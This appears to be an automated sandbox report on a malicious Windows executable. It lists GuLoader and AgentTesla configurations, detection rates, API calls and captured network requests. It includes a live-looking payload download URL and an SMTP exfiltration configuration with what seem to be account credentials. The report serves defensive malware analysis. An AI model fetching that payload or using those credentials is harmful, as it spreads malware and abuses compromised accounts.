Source: 00000003.00000000.15477945295.0000000000BC0000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E"} |
Source: conhost.exe.956.4.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "titkarsag@ferdi.huQ1w2e3r4t5!mail.ferdi.hulucassevirus@gmail.com"} |
Source: FRACCIONAMIENTO 1722403906461L.exe | Virustotal: Detection: 27% |
Source: FRACCIONAMIENTO 1722403906461L.exe | ReversingLabs: Detection: 12% |
Source: FRACCIONAMIENTO 1722403906461L.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: unknown | HTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49753 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49785 version: TLS 1.2 |
Source: FRACCIONAMIENTO 1722403906461L.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe | Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 1_2_00405D74 |
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe | Code function: 1_2_0040290B FindFirstFileW, | 1_2_0040290B |
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe | Code function: 1_2_0040699E FindFirstFileW,FindClose, | 1_2_0040699E |
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0al9jnh9ri2cnupcf3pilpptme4k7l2h/1650461475000/18066694053602596605/*/1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0c-74-docs.googleusercontent.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden Content-Length: 1103 Content-Type: text/html; charset=UTF-8 Date: Wed, 20 Apr 2022 13:29:23 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |